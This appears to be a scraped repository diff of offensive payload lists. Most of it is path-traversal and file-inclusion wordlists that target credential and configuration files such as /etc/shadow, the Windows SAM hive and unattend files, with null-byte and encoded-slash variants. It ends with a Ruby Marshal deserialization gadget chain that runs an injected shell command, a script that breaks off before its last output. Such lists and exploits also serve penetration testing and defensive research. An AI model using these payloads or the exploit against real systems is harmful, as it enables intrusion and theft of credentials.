/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
|
||||
/web/conf/php.ini
|
||||
/web/conf/php.ini
|
||||
/web/conf/php.ini%00
|
||||
/WINDOWS\php.ini
|
||||
/WINDOWS\php.ini
|
||||
/WINDOWS\php.ini%00
|
||||
/WINNT\php.ini
|
||||
/WINNT\php.ini
|
||||
/WINNT\php.ini%00
|
||||
/www/logs/proftpd.system.log
|
||||
/www/logs/proftpd.system.log
|
||||
/www/logs/proftpd.system.log%00
|
||||
/xampp\apache\bin\php.ini
|
||||
/xampp\apache\bin\php.ini
|
||||
/xampp\apache\bin\php.ini%00
|
||||
\xampp\apache\conf\httpd.conf
|
||||
\xampp\apache\logs\access.log
|
||||
\xampp\apache\logs\error.log
|
||||
\xampp\FileZillaFTP\FileZilla Server.xml
|
||||
\xampp\FileZillaFTP\Logs
|
||||
\xampp\FileZillaFTP\Logs\access.log
|
||||
\xampp\FileZillaFTP\Logs\error.log
|
||||
\xampp\MercuryMail\LOGS\access.log
|
||||
\xampp\MercuryMail\LOGS\error.log
|
||||
\xampp\MercuryMail\mercury.ini
|
||||
\xampp\mysql\data\mysql.err
|
||||
\xampp\phpmyadmin\config.inc
|
||||
\xampp\phpMyAdmin\config.inc
|
||||
\xampp\phpmyadmin\config.inc.php
|
||||
\xampp\phpMyAdmin\config.inc.php
|
||||
\xampp\phpmyadmin\phpinfo.php
|
||||
\xampp\phpMyAdmin\phpinfo.php
|
||||
\xampp\php\php.ini
|
||||
\xampp\sendmail\sendmail.ini
|
||||
\xampp\sendmail\sendmail.log
|
||||
\xampp\tomcat\conf\tomcat-users.xml
|
||||
\xampp\tomcat\conf\web.xml
|
||||
\xampp\webalizer\webalizer.conf
|
||||
\xampp\webdav\webdav.txt
|
|
@ -0,0 +1,319 @@
|
|||
/etc/passwd%00
|
||||
/etc/passwd%00
|
||||
/etc/shadow%00
|
||||
/etc/group%00
|
||||
/etc/security/group%00
|
||||
/etc/security/passwd%00
|
||||
/etc/security/user%00
|
||||
/etc/security/environ%00
|
||||
/etc/security/limits%00
|
||||
/usr/lib/security/mkuser.default%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/etc/httpd/logs/acces_log%00
|
||||
/etc/httpd/logs/acces.log%00
|
||||
/etc/httpd/logs/error_log%00
|
||||
/etc/httpd/logs/error.log%00
|
||||
/var/www/logs/access_log%00
|
||||
/var/www/logs/access.log%00
|
||||
/usr/local/apache/logs/access_ log%00
|
||||
/usr/local/apache/logs/access. log%00
|
||||
/var/log/apache/access_log%00
|
||||
/var/log/apache2/access_log%00
|
||||
/var/log/apache/access.log%00
|
||||
/var/log/apache2/access.log%00
|
||||
/var/log/access_log%00
|
||||
/var/log/access.log%00
|
||||
/var/www/logs/error_log%00
|
||||
/var/www/logs/error.log%00
|
||||
/usr/local/apache/logs/error_log%00
|
||||
/usr/local/apache/logs/error.log%00
|
||||
/var/log/apache/error_log%00
|
||||
/var/log/apache2/error_log%00
|
||||
/var/log/apache/error.log%00
|
||||
/var/log/apache2/error.log%00
|
||||
/var/log/error_log%00
|
||||
/var/log/error.log%00
|
||||
/var/log/httpd/access_log%00
|
||||
/var/log/httpd/error_log%00
|
||||
/var/log/httpd/access_log%00
|
||||
/var/log/httpd/error_log%00
|
||||
/var/log/nginx/access_log%00
|
||||
/var/log/nginx/access.log%00
|
||||
/var/log/nginx/error_log%00
|
||||
/var/log/nginx/error.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache2/logs/error.log%00
|
||||
/apache2/logs/access.log%00
|
||||
/apache2/logs/error.log%00
|
||||
/apache2/logs/access.log%00
|
||||
/apache2/logs/error.log%00
|
||||
/apache2/logs/access.log%00
|
||||
/apache2/logs/error.log%00
|
||||
/apache2/logs/access.log%00
|
||||
/apache2/logs/error.log%00
|
||||
/apache2/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/etc/httpd/logs/acces_log%00
|
||||
/etc/httpd/logs/acces.log%00
|
||||
/etc/httpd/logs/error_log%00
|
||||
/etc/httpd/logs/error.log%00
|
||||
/usr/local/apache/logs/access_log%00
|
||||
/usr/local/apache/logs/access.log%00
|
||||
/usr/local/apache/logs/error_log%00
|
||||
/usr/local/apache/logs/error.log%00
|
||||
/usr/local/apache2/logs/access_log%00
|
||||
/usr/local/apache2/logs/access.log%00
|
||||
/usr/local/apache2/logs/error_log%00
|
||||
/usr/local/apache2/logs/error.log%00
|
||||
/var/www/logs/access_log%00
|
||||
/var/www/logs/access.log%00
|
||||
/var/www/logs/error_log%00
|
||||
/var/www/logs/error.log%00
|
||||
/var/log/httpd/access_log%00
|
||||
/var/log/httpd/access.log%00
|
||||
/var/log/httpd/error_log%00
|
||||
/var/log/httpd/error.log%00
|
||||
/var/log/apache/access_log%00
|
||||
/var/log/apache/access.log%00
|
||||
/var/log/apache/error_log%00
|
||||
/var/log/apache/error.log%00
|
||||
/var/log/apache2/access_log%00
|
||||
/var/log/apache2/access.log%00
|
||||
/var/log/apache2/error_log%00
|
||||
/var/log/apache2/error.log%00
|
||||
/var/log/access_log%00
|
||||
/var/log/access.log%00
|
||||
/var/log/error_log%00
|
||||
/var/log/error.log%00
|
||||
/opt/lampp/logs/access_log%00
|
||||
/opt/lampp/logs/error_log%00
|
||||
/opt/xampp/logs/access_log%00
|
||||
/opt/xampp/logs/error_log%00
|
||||
/opt/lampp/logs/access.log%00
|
||||
/opt/lampp/logs/error.log%00
|
||||
/opt/xampp/logs/access.log%00
|
||||
/opt/xampp/logs/error.log%00
|
||||
/Program Files\Apache Group\Apache\logs\access.log%00
|
||||
/Program Files\Apache Group\Apache\logs\error.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/apache/logs/error.log%00
|
||||
/apache/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/logs/error.log%00
|
||||
/logs/access.log%00
|
||||
/etc/httpd/logs/acces_log%00
|
||||
/etc/httpd/logs/acces.log%00
|
||||
/etc/httpd/logs/error_log%00
|
||||
/etc/httpd/logs/error.log%00
|
||||
/var/www/logs/access_log%00
|
||||
/var/www/logs/access.log%00
|
||||
/usr/local/apache/logs/access_log%00
|
||||
/usr/local/apache/logs/access.log%00
|
||||
/var/log/apache/access_log%00
|
||||
/var/log/apache/access.log%00
|
||||
/var/log/access_log%00
|
||||
/var/www/logs/error_log%00
|
||||
/var/www/logs/error.log%00
|
||||
/usr/local/apache/logs/error_log%00
|
||||
/usr/local/apache/logs/error.log%00
|
||||
/var/log/apache/error_log%00
|
||||
/var/log/apache/error.log%00
|
||||
/var/log/access_log%00
|
||||
/var/log/error_log%00
|
||||
/usr/local/apache/conf/httpd.conf%00
|
||||
/usr/local/apache2/conf/httpd.conf%00
|
||||
/etc/httpd/conf/httpd.conf%00
|
||||
/etc/apache/conf/httpd.conf%00
|
||||
/usr/local/etc/apache/conf/httpd.conf%00
|
||||
/etc/apache2/httpd.conf%00
|
||||
/usr/local/apache/conf/httpd.conf%00
|
||||
/usr/local/apache2/conf/httpd.conf%00
|
||||
/usr/local/apache/httpd.conf%00
|
||||
/usr/local/apache2/httpd.conf%00
|
||||
/usr/local/httpd/conf/httpd.conf%00
|
||||
/usr/local/etc/apache/conf/httpd.conf%00
|
||||
/usr/local/etc/apache2/conf/httpd.conf%00
|
||||
/usr/local/etc/httpd/conf/httpd.conf%00
|
||||
/usr/apache2/conf/httpd.conf%00
|
||||
/usr/apache/conf/httpd.conf%00
|
||||
/usr/local/apps/apache2/conf/httpd.conf%00
|
||||
/usr/local/apps/apache/conf/httpd.conf%00
|
||||
/etc/apache/conf/httpd.conf%00
|
||||
/etc/apache2/conf/httpd.conf%00
|
||||
/etc/httpd/conf/httpd.conf%00
|
||||
/etc/http/conf/httpd.conf%00
|
||||
/etc/apache2/httpd.conf%00
|
||||
/etc/httpd/httpd.conf%00
|
||||
/etc/http/httpd.conf%00
|
||||
/etc/httpd.conf%00
|
||||
/opt/apache/conf/httpd.conf%00
|
||||
/opt/apache2/conf/httpd.conf%00
|
||||
/var/www/conf/httpd.conf%00
|
||||
/private/etc/httpd/httpd.conf%00
|
||||
/private/etc/httpd/httpd.conf.default%00
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf%00
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
|
||||
/Program Files\xampp\apache\conf\httpd.conf%00
|
||||
/usr/local/php/httpd.conf.php%00
|
||||
/usr/local/php4/httpd.conf.php%00
|
||||
/usr/local/php5/httpd.conf.php%00
|
||||
/usr/local/php/httpd.conf%00
|
||||
/usr/local/php4/httpd.conf%00
|
||||
/usr/local/php5/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
|
||||
/usr/local/etc/apache/vhosts.conf%00
|
||||
/etc/php.ini%00
|
||||
/bin/php.ini%00
|
||||
/etc/httpd/php.ini%00
|
||||
/usr/lib/php.ini%00
|
||||
/usr/lib/php/php.ini%00
|
||||
/usr/local/etc/php.ini%00
|
||||
/usr/local/lib/php.ini%00
|
||||
/usr/local/php/lib/php.ini%00
|
||||
/usr/local/php4/lib/php.ini%00
|
||||
/usr/local/php5/lib/php.ini%00
|
||||
/usr/local/apache/conf/php.ini%00
|
||||
/etc/php4.4/fcgi/php.ini%00
|
||||
/etc/php4/apache/php.ini%00
|
||||
/etc/php4/apache2/php.ini%00
|
||||
/etc/php5/apache/php.ini%00
|
||||
/etc/php5/apache2/php.ini%00
|
||||
/etc/php/php.ini%00
|
||||
/etc/php/php4/php.ini%00
|
||||
/etc/php/apache/php.ini%00
|
||||
/etc/php/apache2/php.ini%00
|
||||
/web/conf/php.ini%00
|
||||
/usr/local/Zend/etc/php.ini%00
|
||||
/opt/xampp/etc/php.ini%00
|
||||
/var/local/www/conf/php.ini%00
|
||||
/etc/php/cgi/php.ini%00
|
||||
/etc/php4/cgi/php.ini%00
|
||||
/etc/php5/cgi/php.ini%00
|
||||
/php5\php.ini%00
|
||||
/php4\php.ini%00
|
||||
/php\php.ini%00
|
||||
/PHP\php.ini%00
|
||||
/WINDOWS\php.ini%00
|
||||
/WINNT\php.ini%00
|
||||
/apache\php\php.ini%00
|
||||
/xampp\apache\bin\php.ini%00
|
||||
/NetServer\bin\stable\apache\php.ini%00
|
||||
/home2\bin\stable\apache\php.ini%00
|
||||
/home\bin\stable\apache\php.ini%00
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
|
||||
/usr/local/cpanel/logs%00
|
||||
/usr/local/cpanel/logs/stats_log%00
|
||||
/usr/local/cpanel/logs/access_log%00
|
||||
/usr/local/cpanel/logs/error_log%00
|
||||
/usr/local/cpanel/logs/license_log%00
|
||||
/usr/local/cpanel/logs/login_log%00
|
||||
/usr/local/cpanel/logs/stats_log%00
|
||||
/var/cpanel/cpanel.config%00
|
||||
/var/log/mysql/mysql-bin.log%00
|
||||
/var/log/mysql.log%00
|
||||
/var/log/mysqlderror.log%00
|
||||
/var/log/mysql/mysql.log%00
|
||||
/var/log/mysql/mysql-slow.log%00
|
||||
/var/mysql.log%00
|
||||
/var/lib/mysql/my.cnf%00
|
||||
/etc/mysql/my.cnf%00
|
||||
/etc/my.cnf%00
|
||||
/etc/logrotate.d/proftpd%00
|
||||
/www/logs/proftpd.system.log%00
|
||||
/var/log/proftpd%00
|
||||
/etc/proftp.conf%00
|
||||
/etc/protpd/proftpd.conf%00
|
||||
/etc/vhcs2/proftpd/proftpd.conf%00
|
||||
/etc/proftpd/modules.conf%00
|
||||
/var/log/vsftpd.log%00
|
||||
/etc/vsftpd.chroot_list%00
|
||||
/etc/logrotate.d/vsftpd.log%00
|
||||
/etc/vsftpd/vsftpd.conf%00
|
||||
/etc/vsftpd.conf%00
|
||||
/etc/chrootUsers%00
|
||||
/var/log/xferlog%00
|
||||
/var/adm/log/xferlog%00
|
||||
/etc/wu-ftpd/ftpaccess%00
|
||||
/etc/wu-ftpd/ftphosts%00
|
||||
/etc/wu-ftpd/ftpusers%00
|
||||
/usr/sbin/pure-config.pl%00
|
||||
/usr/etc/pure-ftpd.conf%00
|
||||
/etc/pure-ftpd/pure-ftpd.conf%00
|
||||
/usr/local/etc/pure-ftpd.conf%00
|
||||
/usr/local/etc/pureftpd.pdb%00
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb%00
|
||||
/usr/local/pureftpd/sbin/pure-config.pl%00
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf%00
|
||||
/etc/pure-ftpd.conf%00
|
||||
/etc/pure-ftpd/pure-ftpd.pdb%00
|
||||
/etc/pureftpd.pdb%00
|
||||
/etc/pureftpd.passwd%00
|
||||
/etc/pure-ftpd/pureftpd.pdb%00
|
||||
/usr/ports/ftp/pure-ftpd/%00
|
||||
/usr/ports/net/pure-ftpd/%00
|
||||
/usr/pkgsrc/net/pureftpd/%00
|
||||
/usr/ports/contrib/pure-ftpd/%00
|
||||
/var/log/pure-ftpd/pure-ftpd.log%00
|
||||
/logs/pure-ftpd.log%00
|
||||
/var/log/pureftpd.log%00
|
||||
/var/log/ftp-proxy/ftp-proxy.log%00
|
||||
/var/log/ftp-proxy%00
|
||||
/var/log/ftplog%00
|
||||
/etc/logrotate.d/ftp%00
|
||||
/etc/ftpchroot%00
|
||||
/etc/ftphosts%00
|
||||
/var/log/exim_mainlog%00
|
||||
/var/log/exim/mainlog%00
|
||||
/var/log/maillog%00
|
||||
/var/log/exim_paniclog%00
|
||||
/var/log/exim/paniclog%00
|
||||
/var/log/exim/rejectlog%00
|
||||
/var/log/exim_rejectlog%00
|
|
@ -0,0 +1,8 @@
|
|||
/etc/apache2/httpd.conf
|
||||
/Library/WebServer/Documents/index.html
|
||||
/private/var/log/appstore.log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/access_log
|
||||
/usr/local/nginx/conf/nginx.conf
|
||||
/var/log/nginx/error_log
|
||||
/var/log/nginx/access_log
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,14 @@
|
|||
/robots.txt
|
||||
/humans.txt
|
||||
/style.css
|
||||
/configuration.php
|
||||
wp-login.php
|
||||
wp-admin.php
|
||||
/wp-content/plugins
|
||||
/include/config.php
|
||||
/inc/config.php
|
||||
/include/mysql.php
|
||||
/inc/mysql.php
|
||||
/sites/defaults/settings.php
|
||||
/phpmyadmin/changelog.php
|
||||
web.config
|
|
@ -0,0 +1,212 @@
|
|||
C:/$recycle.bin/s-1-5-18/desktop.ini
|
||||
C:/apache2/log/access.log
|
||||
C:/apache2/log/access_log
|
||||
C:/apache2/log/error.log
|
||||
C:/apache2/log/error_log
|
||||
C:/apache2/logs/access.log
|
||||
C:/apache2/logs/access_log
|
||||
C:/apache2/logs/error.log
|
||||
C:/apache2/logs/error_log
|
||||
C:/apache/log/access.log
|
||||
C:/apache/log/access_log
|
||||
C:/apache/log/error.log
|
||||
C:/apache/log/error_log
|
||||
C:/apache/logs/access.log
|
||||
C:/apache/logs/access_log
|
||||
C:\apache\logs\access.log
|
||||
C:/apache/logs/error.log
|
||||
C:/apache/logs/error_log
|
||||
C:\apache\logs\error.log
|
||||
C:/apache/php/php.ini
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
C:/documents and settings/administrator/desktop/desktop.ini
|
||||
C:/documents and settings/administrator/ntuser.dat
|
||||
C:/documents and settings/administrator/ntuser.ini
|
||||
C:/home2/bin/stable/apache/php.ini
|
||||
C:/home/bin/stable/apache/php.ini
|
||||
C:/inetpub/logs/logfiles
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:/inetpub/wwwroot/index.asp
|
||||
C:/inetpub/wwwroot/web.config
|
||||
C:/log/access.log
|
||||
C:/log/access_log
|
||||
C:/log/error.log
|
||||
C:/log/error_log
|
||||
C:/log/httpd/access_log
|
||||
C:/log/httpd/error_log
|
||||
C:/logs/access.log
|
||||
C:/logs/access_log
|
||||
C:/logs/error.log
|
||||
C:/logs/error_log
|
||||
C:/logs/httpd/access_log
|
||||
C:/logs/httpd/error_log
|
||||
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
|
||||
C:/mysql/bin/my.ini
|
||||
C:/mysql/data/hostname.err
|
||||
C:/mysql/data/mysql.err
|
||||
C:/mysql/data/mysql.log
|
||||
C:/mysql/my.cnf
|
||||
C:/mysql/my.ini
|
||||
C:\nginx-1.7.4\conf\nginx.conf
|
||||
C:\nginx-1.7.4\nginx.conf
|
||||
C:/opt/xampp/logs/access.log
|
||||
C:/opt/xampp/logs/access_log
|
||||
C:/opt/xampp/logs/error.log
|
||||
C:/opt/xampp/logs/error_log
|
||||
C:/php4/php.ini
|
||||
C:/php4/sessions/
|
||||
C:/php5/php.ini
|
||||
C:/php5/sessions/
|
||||
C:/php/php.ini
|
||||
C:/php/sessions/
|
||||
C:/program files/apache group/apache2/conf/httpd.conf
|
||||
C:/program files/apachegroup/apache2/conf/httpd.conf
|
||||
C:/programfiles/apachegroup/apache2/conf/httpd.conf
|
||||
C:/program files/apache group/apache/conf/httpd.conf
|
||||
C:/program files/apachegroup/apache/conf/httpd.conf
|
||||
C:/programfiles/apachegroup/apache/conf/httpd.conf
|
||||
C:/program files/apache group/apache/logs/access.log
|
||||
C:/program files/apache group/apache/logs/error.log
|
||||
C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf
|
||||
C:\Program Files\Apache Software Foundation\Apache2.2\logs\access.log
|
||||
C:\Program Files\Apache Software Foundation\Apache2.2\logs\error.log
|
||||
C:/program files/filezilla server/filezilla server.xml
|
||||
C:/program files/mysql/data/hostname.err
|
||||
C:/program files/mysql/data/mysql-bin.log
|
||||
C:/program files/mysql/data/mysql.err
|
||||
C:/program files/mysql/data/mysql.log
|
||||
C:/program files/mysql/my.cnf
|
||||
C:/program files/mysql/my.ini
|
||||
C:/program files/mysql/mysql server 5.0/data/hostname.err
|
||||
C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
|
||||
C:/program files/mysql/mysql server 5.0/data/mysql.err
|
||||
C:/program files/mysql/mysql server 5.0/data/mysql.log
|
||||
C:/program files/mysql/mysql server 5.0/my.cnf
|
||||
C:/program files/mysql/mysql server 5.0/my.ini
|
||||
C:/program files/mysql/mysql server 5.1/my.ini
|
||||
C:/program files (x86)/apache group/apache2/conf/httpd.conf
|
||||
C:/program files (x86)/apache group/apache/conf/access.log
|
||||
C:/program files (x86)/apache group/apache/conf/error.log
|
||||
C:/program files (x86)/apache group/apache/conf/httpd.conf
|
||||
C:/program files (x86)/filezilla server/filezilla server.xml
|
||||
C:/program files (x86)/xampp/apache/conf/httpd.conf
|
||||
C:/program files/xampp/apache/conf/httpd.conf
|
||||
C:/programfiles/xampp/apache/conf/httpd.conf
|
||||
C:/program files/xampp/apache/conf/httpd.confetc/passwd
|
||||
C:/sysprep.inf
|
||||
C:/sysprep/sysprep.inf
|
||||
C:/sysprep/sysprep.xml
|
||||
C:/sysprep.xml
|
||||
C:/system32/inetsrv/metabase.xml
|
||||
C:/system volume information/wpsettings.dat
|
||||
C:/unattended.txt
|
||||
C:/unattended.xml
|
||||
C:/unattend.txt
|
||||
C:/unattend.xml
|
||||
C:/users/administrator/desktop/desktop.ini
|
||||
C:/users/administrator/ntuser.dat
|
||||
C:/users/administrator/ntuser.ini
|
||||
C:\wamp\apache2\logs\access.log
|
||||
C:\wamp\apache2\logs\access_log
|
||||
C:\wamp\apache2\logs\error.log
|
||||
C:\wamp\apache2\logs\error_log
|
||||
C:\wamp\logs\access.log
|
||||
C:\wamp\logs\access_log
|
||||
C:\wamp\logs\error.log
|
||||
C:\wamp\logs\error_log
|
||||
C:/windows/csc/v2.0.6/pq
|
||||
C:/windows/csc/v2.0.6/sm
|
||||
C:/windows/debug/netsetup.log
|
||||
C:/windows/explorer.exe
|
||||
C:/windows/iis6.log
|
||||
C:/windows/iis6.log (5,6 or 7)
|
||||
C:/windows/iis7.log
|
||||
C:/windows/iis8.log
|
||||
C:/windows/notepad.exe
|
||||
C:/windows/panther/setupinfo
|
||||
C:/windows/panther/setupinfo.bak
|
||||
C:/windows/panther/sysprep.inf
|
||||
C:/windows/panther/sysprep.xml
|
||||
C:/windows/panther/unattended.txt
|
||||
C:/windows/panther/unattended.xml
|
||||
C:/windows/panther/unattend/setupinfo
|
||||
C:/windows/panther/unattend/setupinfo.bak
|
||||
C:/windows/panther/unattend/sysprep.inf
|
||||
C:/windows/panther/unattend/sysprep.xml
|
||||
C:/windows/panther/unattend.txt
|
||||
C:/windows/panther/unattend/unattended.txt
|
||||
C:/windows/panther/unattend/unattended.xml
|
||||
C:/windows/panther/unattend/unattend.txt
|
||||
C:/windows/panther/unattend/unattend.xml
|
||||
C:/windows/panther/unattend.xml
|
||||
C:/windows/php.ini
|
||||
C:/windows/repair/sam
|
||||
C:/windows/repair/security
|
||||
C:/windows/repair/software
|
||||
C:/windows/repair/system
|
||||
C:/windows/system32/config/appevent.evt
|
||||
C:/windows/system32/config/default.sav
|
||||
C:/windows/system32/config/regback/default
|
||||
C:/windows/system32/config/regback/sam
|
||||
C:/windows/system32/config/regback/security
|
||||
C:/windows/system32/config/regback/software
|
||||
C:/windows/system32/config/regback/system
|
||||
C:/windows/system32/config/sam
|
||||
C:/windows/system32/config/secevent.evt
|
||||
C:/windows/system32/config/security.sav
|
||||
C:/windows/system32/config/software.sav
|
||||
C:/windows/system32/config/system
|
||||
C:/windows/system32/config/system.sa
|
||||
C:/windows/system32/config/system.sav
|
||||
C:/windows/system32/drivers/etc/hosts
|
||||
C:/windows/system32/eula.txt
|
||||
C:/windows/system32/inetsrv/config/applicationhost.config
|
||||
C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
|
||||
C:/windows/system32/license.rtf
|
||||
C:/windows/system32/logfiles/httperr/httperr1.log
|
||||
C:/windows/system32/sysprep.inf
|
||||
C:/windows/system32/sysprepsysprep.inf
|
||||
C:/windows/system32/sysprep/sysprep.xml
|
||||
C:/windows/system32/sysprepsysprep.xml
|
||||
C:/windows/system32/sysprepunattended.txt
|
||||
C:/windows/system32/sysprepunattended.xml
|
||||
C:/windows/system32/sysprepunattend.txt
|
||||
C:/windows/system32/sysprepunattend.xml
|
||||
C:/windows/system32/sysprep.xml
|
||||
C:/windows/system32/unattended.txt
|
||||
C:/windows/system32/unattended.xml
|
||||
C:/windows/system32/unattend.txt
|
||||
C:/windows/system32/unattend.xml
|
||||
C:/windows/system.ini
|
||||
C:/windows/temp/
|
||||
C:/windows/windowsupdate.log
|
||||
C:/windows/win.ini
|
||||
C:/winnt/php.ini
|
||||
C:/winnt/win.ini
|
||||
C:/xampp/apache/bin/php.ini
|
||||
C:/xampp/apache/conf/httpd.conf
|
||||
C:/xampp/apache/logs/access.log
|
||||
C:\xampp\apache\logs\access.log
|
||||
C:\xampp\apache\logs\access_log
|
||||
C:/xampp/apache/logs/error.log
|
||||
C:\xampp\apache\logs\error.log
|
||||
C:\xampp\apache\logs\error_log
|
||||
C:/xampp/filezillaftp/filezilla server.xml
|
||||
C:/xampp/filezillaftp/logs
|
||||
C:/xampp/filezillaftp/logs/access.log
|
||||
C:/xampp/filezillaftp/logs/error.log
|
||||
C:/xampp/mercurymail/logs/access.log
|
||||
C:/xampp/mercurymail/logs/error.log
|
||||
C:/xampp/mercurymail/mercury.ini
|
||||
C:/xampp/mysql/data/mysql.err
|
||||
C:/xampp/phpmyadmin/config.inc
|
||||
C:/xampp/phpmyadmin/config.inc.php
|
||||
C:/xampp/phpmyadmin/phpinfo.php
|
||||
C:/xampp/php/php.ini
|
||||
C:/xampp/sendmail/sendmail.ini
|
||||
C:/xampp/sendmail/sendmail.log
|
||||
C:/xampp/tomcat/conf/tomcat-users.xml
|
||||
C:/xampp/tomcat/conf/web.xml
|
||||
C:/xampp/webalizer/webalizer.conf
|
||||
C:/xampp/webdav/webdav.txt
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,10 @@
|
|||
etc/passwd
|
||||
etc/passwd%00
|
||||
etc%2fpasswd
|
||||
etc%2fpasswd%00
|
||||
etc%5cpasswd
|
||||
etc%5cpasswd%00
|
||||
etc%c0%afpasswd
|
||||
etc%c0%afpasswd%00
|
||||
C:\boot.ini
|
||||
C:\WINDOWS\win.ini
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
Binary file not shown.
After Width: | Height: | Size: 21 KiB |
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,66 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
class Gem::StubSpecification
|
||||
def initialize; end
|
||||
end
|
||||
|
||||
|
||||
stub_specification = Gem::StubSpecification.new
|
||||
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
|
||||
|
||||
puts "STEP n"
|
||||
stub_specification.name rescue nil
|
||||
puts
|
||||
|
||||
|
||||
class Gem::Source::SpecificFile
|
||||
def initialize; end
|
||||
end
|
||||
|
||||
specific_file = Gem::Source::SpecificFile.new
|
||||
specific_file.instance_variable_set(:@spec, stub_specification)
|
||||
|
||||
other_specific_file = Gem::Source::SpecificFile.new
|
||||
|
||||
puts "STEP n-1"
|
||||
specific_file <=> other_specific_file rescue nil
|
||||
puts
|
||||
|
||||
|
||||
$dependency_list= Gem::DependencyList.new
|
||||
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
|
||||
|
||||
puts "STEP n-2"
|
||||
$dependency_list.each{} rescue nil
|
||||
puts
|
||||
|
||||
|
||||
class Gem::Requirement
|
||||
def marshal_dump
|
||||
[$dependency_list]
|
||||
end
|
||||
end
|
||||
|
||||
payload = Marshal.dump(Gem::Requirement.new)
|
||||
|
||||
puts "STEP n-3"
|
||||
Marshal.load(payload) rescue nil
|
||||
puts
|
||||
|
||||
|
||||
puts "VALIDATION (in fresh ruby process):"
|
||||
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
|
||||
pipe.print payload
|
||||
pipe.close_write
|
||||
puts pipe.gets
|
||||
puts
|
||||
end
|
||||
|
||||
puts "Payload (hex):"
|
||||
